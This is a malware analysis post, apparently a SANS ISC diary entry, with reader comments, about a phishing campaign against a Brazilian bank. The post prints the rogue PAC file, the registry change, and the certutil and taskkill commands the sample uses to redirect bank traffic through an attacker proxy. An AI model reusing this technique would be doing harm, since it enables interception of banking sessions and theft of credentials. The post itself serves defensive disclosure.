Example of Targeted Attack Through a Proxy PAC File

Published: 2016-08-24
Last Updated: 2016-08-25 05:54:18 UTC
by Xavier Mertens (Version: 1)
7 comment(s)

Yesterday, I discovered a nice example of targeted attack against a Brazilian bank. It started with an email sample like this:

This message was sent to a Brazilian citizen. Redacted in Portuguese, it could be approximately translated with the help of Google to: "Please find attached the pay slip of Augustus 2016 which expires on Monday 29/08/2016...".

The picture is a link to a RAR file "visualizar_imprimir.rar" (MD5: c2781a11e7de53cc0ddb2161628454cb) which contains a malicious PE file "visualizar_imprimir.exe" (MD5: c5e9014a82a889dcf2c5fd66ba5f1dca). This file had a VT score of 0/55 [1] when I scanned it for the first time (24/08/2016 12:09 UTC). [Update: this morning, the score is 1/55 - Kasperski reports it as malicious]

The malware is quite simple. First, it changes the Internet settings by modifying the following registry key for the current user:

\REGISTRY\USER\S-1-5-21-xxxxxxxx\Software\Microsoft\Windows\CurrentVersion\Internet Settings\AutoConfigURL = http://chrome-ie.com.br/1.png

Note: files from 0.png to 9.png are available and they have the same content.

This registry key will force the browser to fetch the file and apply the new settings. Indeed, the file "1.png" is not a picture but a rogue PAC[2] file that contains a filter for only one URL: the Brazilian bank website. Here is a dump of the PAC file:

function FindProxyForURL(url, host)
{
var a = "PROXY 200.98.202.51:1023";
if (shExpMatch(host, "www.san*ander.com.br*")) {
     return a;
}

if (shExpMatch(host, "san*ander.com.br*")) {
     return a;
}

return "DIRECT";
}

The IP address is located in Brazil [3].

The next step performed by the malware is to install a rogue root CA certificate to prevent all annoying pop-ups for the user when he will visit the bank website:

cmd /C certutil -addstore -user root %USERPROFILE%\AppData\Roaming\1.cer

Finally, all running browsers are killed (in the hard way!) to force a reload of its configuration. Note that when I performed my analysis, only Chrome was killed. I presume that the malware searches for running browsers and only kill them if found.

taskkill /F /IM “chrome.exe"

From now, if the victim visits "www.san*ander.com.br*", his/her browser will forward all requests to the rogue proxy server running on 200.98.202.51:1023 otherwise it will fetch all other URLs directly. I tested the proxy (a Squid/3.3.8) with other URLs and I always got a permission denied. Normal behavior or configuration error? I don't know.

If you configure manually your browser with the IP address and port above as a proxy and you try to access www.santander.com.be, you will be presented with the rogue SSL certificate:

Here is the good one (issued by GeoTrust):

As you can see with this example, it is quite easy to hijack the traffic from specific websites. With this technique, no need to use a complex exploit or to try to break the encryption. Just change the browser behavior and you will get a copy of all the victim's traffic.

Stay safe!

[1] https://www.virustotal.com/en/file/cccbd8a8d485d386486cf790ada90415ac71ef7e637e7abcc4d39bf443d7b4fe/analysis/1472040570/
[2] https://en.wikipedia.org/wiki/Proxy_auto-config
[3] 200.98.202.51

Xavier Mertens (@xme)
ISC Handler - Freelance Security Consultant
PGP Key

7 comment(s)

Comments

And since Santander is not using an Extended Validation ("green bar") HTTPS certificate, there probably are no visual clues to the victim. I suspect that's because they have almost sixty Subject Alternative Names on that cert so they decided to save some money. But not to worry, their little padlock next to the Internet Banking login fields will still be there.

One little-known side effect of using a script file to configure a proxy in Windows is that this statement:

return "DIRECT";

automatically puts those DIRECT sites into the Local Intranet zone. So if you have a PAC file with multiple sections that decide how to handle multiple sites and some are on the Internet, those "DIRECT" Internet sites automatically run as Local Intranet. Automatic Logon by passing Windows creds, lowered security settings, etc.

So what that malware also does as a side effect, at least from an IE/Edge perspective, is to cause every other website that the victim visits to be placed in the Local Intranet zone. On the positive side, many of those annoying warnings about security problems will just go away. This could actually be the only case where a website loads cleaner in IE/Edge than it does in third-party browsers. :-)
So what are you recommendations as far as what we can do to best handle all these different types proxy configuration threats - pac scripts, wpad mitm, etc?
I know this is a windows hack, and I can't confirm right now that it isn't the case on windows (Though I would be very surprised since "DIRECT" just means "continue as you would (directly) without a proxy" but CERTAINLY it is not the case on a OSX or Linux box that the "DIRECT" directive has this effect.
Here's one of the articles: https://blogs.msdn.microsoft.com/ieinternals/2012/06/05/the-intranet-zone/

"(WPAD) Proxy Script. If the user’s proxy configuration is “Automatically detect settings” or “Use automatic configuration script” inside Tools > Internet Options > Connections > LAN Settings, the browser will run the FindProxyForUrl function in the specified WPAD proxy configuration script to determine which proxy should be used for each request. If the script returns “DIRECT”, the browser will bypass the proxy and the site will be mapped into the Local Intranet Zone."

That's not the one where I originally found it but it is validation. Pretty ugly, huh?
You missed but the "PS:" your fellow handler Duncan now adds regularly: on a properly administered Windows installation, execution of arbitrary executables is disabled for standard users via AppLocker or Software Restriction Policies, so this type of malware is almost harmless there.

Additionally: whoever sends a .RAR archive to Windows users is an idiot! He'd better use an archive format which Windows can handle out-of-the-box.
I had the same thoughts on the use of the .RAR format but perhaps this was targeted or perhaps that format is more popular in Brazil than the US. Since it appears targeted to home users, there's no such thing as a properly administered Windows machine. In a corporate environment where the admins didn't take the easy way out by using a transparent proxy, it also would (should) fail by changing the corporate proxy settings and breaking Internet access entirely.
I've seen many phishing emails in French on the start of this week with .RAR payload not in attachment but with URL.
VT : 51ca089c624294abaef9481baad37a3b7723a03d4ebe55033f96e200ed027611
Rising of RAR ?

Diary Archives